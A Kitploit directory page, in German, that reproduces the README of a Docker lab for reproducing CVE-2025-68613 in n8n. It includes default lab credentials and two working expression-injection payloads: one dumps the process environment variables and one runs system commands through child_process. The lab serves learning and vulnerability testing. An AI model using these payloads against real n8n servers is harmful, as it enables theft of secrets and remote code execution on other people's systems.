Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

Analyse von CVE-2025-68613

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68613 Lokales n8n-Labor

Dieses Repository enthält eine einfache Docker-Compose-Einrichtung, die eine verwundbare n8n-Instanz zum lokalen Testen von CVE-2025-68613 ausführt.

Voraussetzungen

  • Docker Desktop oder Docker Engine
  • Docker Compose v2

Schnellstart

  1. Starten Sie den Container:

    root@kitploit:~
    docker compose up -d
    
  2. Öffnen Sie n8n in Ihrem Browser:

    • http://localhost:5678
  3. Melden Sie sich mit den in docker-compose.yml festgelegten Standard-Zugangsdaten an:

    • Benutzername: admin
    • Passwort: password

Stoppen und Bereinigen

root@kitploit:~
docker compose down
Tool herunterladen

Haftungsausschluss und Sicherheit

Diese Umgebung ist nur für lokale, isolierte Tests gedacht. Setzen Sie diese Instanz nicht dem öffentlichen Internet oder einem nicht vertrauenswürdigen Netzwerk aus. Halten Sie sie in einem privaten, ausschließlich lokalen Netzwerksegment und getrennt von Produktionssystemen. Nutzung auf eigene Gefahr.

Überprüfen der Schwachstelle (Proof of Concept)

Sobald der Container läuft, können Sie über http://localhost:5678 auf die n8n-Oberfläche zugreifen. Um die Schwachstelle zu testen, injizieren Sie eine schädliche JavaScript-Nutzlast in ein Ausdrucksfeld.

Schritte zur Reproduktion:

  1. Anmelden: Rufen Sie das Dashboard auf (falls Sie Basic Auth eingerichtet haben, verwenden Sie die angegebenen Zugangsdaten; andernfalls erstellen Sie ein neues Owner-Konto).
  2. Workflow erstellen: Klicken Sie auf „Workflow hinzufügen“ oder navigieren Sie zu https://n8n.example.com/workflow/new.
  3. Knoten hinzufügen: Fügen Sie einen „Set“-Knoten hinzu.
  4. Nutzlast injizieren: Geben Sie in das Feld „Wert“ des Set-Knotens (stellen Sie sicher, dass Sie den Modus „Ausdruck“ umschalten, falls verfügbar, oder fügen Sie einfach die Syntax ein, die n8n als Ausdruck interpretiert) eine der folgenden Nutzlasten ein:

Test 1: Exfiltration von Umgebungsvariablen. Diese Nutzlast versucht, auf die Umgebungsvariablen des Prozesses zuzugreifen, die häufig Geheimnisse enthalten.

root@kitploit:~
{{ (function() { return this.process.env; })() }}

Exfiltration von Umgebungsvariablen

Test 2: Remote Code Execution (RCE). Diese Nutzlast versucht, das Modul child_process zu laden, um Systembefehle (z. B. whoami) auszuführen.

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

RCE-Beispiel für den Befehl id

Erwartetes Ergebnis: Wenn die Umgebung verwundbar ist, zeigt das Bedienfeld „Ausgabe“ des Set-Knotens das Ergebnis des Befehls (z. B. root oder der n8n-Benutzer) oder ein JSON-Objekt mit den Umgebungsvariablen an. Wenn die Instanz gepatcht wäre (z. B. Version 1.122.0+), würde die Sandbox ein leeres Objekt oder einen Fehler zurückgeben.